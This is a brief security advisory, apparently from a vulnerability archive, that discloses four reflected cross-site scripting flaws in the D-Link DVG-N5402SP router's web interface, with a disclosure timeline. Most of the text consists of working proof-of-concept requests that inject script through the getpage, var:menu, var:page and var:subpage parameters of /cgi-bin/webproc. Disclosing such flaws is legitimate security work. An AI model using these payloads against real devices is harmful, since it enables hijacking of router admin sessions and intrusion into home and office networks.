D-Link DVG-N5402SP suffers from multiple cross site scripting vulnerabilities.
00212030b0faf3597e3fc1a1ff6f673044fbc8446f0a10ea4595c4099289ccc5
DLink Multiple Cross Site Scripting Vulnerabilities
Vendor : www.dlink.com
Product Model: DVGN5402SP
Published: 02/22/2016
Discovered by vesp3r (vesp3r7c3@gmail.com)
Advisory Timeline
-----------------
02/05/2016 - Vendor notified (No response)
Vulnerability
-------------
Reflected Cross Site Scripting
1) getpage parameter
GET /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced1337"%3balert(1)%2f%2f158&var:page=firewall&var:subpage=URLFilter HTTP/1.1
2) var:menu parameter
GET /cgi-bin/webproc?getpage=html/index.html&errorpage=html/main.html&var:language=zh_cn&var:menu=setup1337"%3balert(1)%2f%2f122&var:page=connected&var:retag=1&var:subpage=- HTTP/1.1
3) var:page parameter
/cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=firewall9542"%3balert(1)%2f%2f198&var:subpage=dmz
4) var:subpage parameter
/cgi-bin/webproc?getpage=html/index.html&errorpage=html/main.html&var:language=zh_cn&var:menu=setup&var:page=connected&var:retag=1&var:subpage="><script>alert(1)<%2fscript>z376l HTTP/1.1